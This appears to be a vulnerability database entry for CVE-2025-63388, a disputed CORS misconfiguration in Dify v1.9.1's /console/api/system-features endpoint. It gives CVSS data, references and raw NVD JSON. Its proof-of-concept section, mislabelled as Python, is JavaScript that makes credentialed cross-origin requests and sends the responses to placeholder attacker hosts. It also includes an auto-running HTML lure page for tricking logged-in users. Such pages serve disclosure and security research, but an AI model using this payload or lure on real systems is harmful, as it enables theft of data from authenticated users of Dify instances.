CVE-2025-63388

Description

A Cross-Origin Resource Sharing (CORS) misconfiguration vulnerability exists in Dify v1.9.1 in the /console/api/system-features endpoint. The endpoint implements an overly permissive CORS policy that reflects arbitrary Origin headers and sets Access-Control-Allow-Credentials: true, allowing any external domain to make authenticated cross-origin requests. NOTE: the Supplier disputes this, providing the rationale of "sending requests with credentials does not provide any additional access compared to unauthenticated requests."

CVSS Details

CVSS Score

9.1

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:langgenius:dify:1.9.1:*:*:*:*:node.js:*:* - VULNERABLE

Dify v1.9.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-63388 PoC - CORS Misconfiguration in Dify v1.9.1
// Target: /console/api/system-features endpoint

const targetUrl = 'https://TARGET_DIFY_INSTANCE/console/api/system-features';

async function exploitCORS() {
    try {
        // Create XMLHttpRequest with credentials
        const xhr = new XMLHttpRequest();
        xhr.open('GET', targetUrl, true);
        xhr.withCredentials = true;
        
        xhr.onreadystatechange = function() {
            if (xhr.readyState === 4) {
                if (xhr.status === 200) {
                    console.log('[+] Success! Received response:');
                    console.log(xhr.responseText);
                    
                    // Extract sensitive data
                    const data = JSON.parse(xhr.responseText);
                    console.log('[+] System Features:', JSON.stringify(data, null, 2));
                    
                    // Send data to attacker server
                    fetch('https://ATTACKER_SERVER/log', {
                        method: 'POST',
                        body: JSON.stringify({
                            cve: 'CVE-2025-63388',
                            data: data
                        })
                    });
                } else {
                    console.log('[-] Request failed with status:', xhr.status);
                }
            }
        };
        
        xhr.send();
    } catch (error) {
        console.error('[-] Error:', error.message);
    }
}

// Execute when page loads
exploitCORS();

// HTML page for social engineering:
const htmlPage = `
<!DOCTYPE html>
<html>
<head><title>Loading...</title></head>
<body>
<script>
// Auto-execute the CORS attack
fetch('TARGET_URL/console/api/system-features', {
    credentials: 'include'
}).then(r => r.json()).then(data => {
    // Exfiltrate data
    fetch('https://attacker.com/exfil', {
        method: 'POST',
        body: JSON.stringify(data)
    });
});
</script>
</body>
</html>
`;

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-63388
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-63388
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-63388/
[4] VulDB https://vuldb.com/cve/CVE-2025-63388
[5] https://gist.github.com/Cristliu/5ded6d03e41d7d66ecb1b568bae3ff6c
[6] https://gist.github.com/Cristliu/c2bc7d05abd89db8eb542a453a528d77
[7] https://github.com/langgenius/dify/discussions

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-63388", "sourceIdentifier": "[email protected]", "published": "2025-12-18T16:15:54.650", "lastModified": "2026-01-28T17:16:07.980", "vulnStatus": "Modified", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["disputed"]}], "descriptions": [{"lang": "en", "value": "A Cross-Origin Resource Sharing (CORS) misconfiguration vulnerability exists in Dify v1.9.1 in the /console/api/system-features endpoint. The endpoint implements an overly permissive CORS policy that reflects arbitrary Origin headers and sets Access-Control-Allow-Credentials: true, allowing any external domain to make authenticated cross-origin requests. NOTE: the Supplier disputes this, providing the rationale of \"sending requests with credentials does not provide any additional access compared to unauthenticated requests.\""}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-346"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:langgenius:dify:1.9.1:*:*:*:*:node.js:*:*", "matchCriteriaId": "ABF9FC69-C390-446E-830C-5F8B0A0488F2"}]}]}], "references": [{"url": "https://gist.github.com/Cristliu/5ded6d03e41d7d66ecb1b568bae3ff6c", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://gist.github.com/Cristliu/c2bc7d05abd89db8eb542a453a528d77", "source": "[email protected]"}, {"url": "https://github.com/langgenius/dify/discussions", "source": "[email protected]", "tags": ["Issue Tracking"]}]}}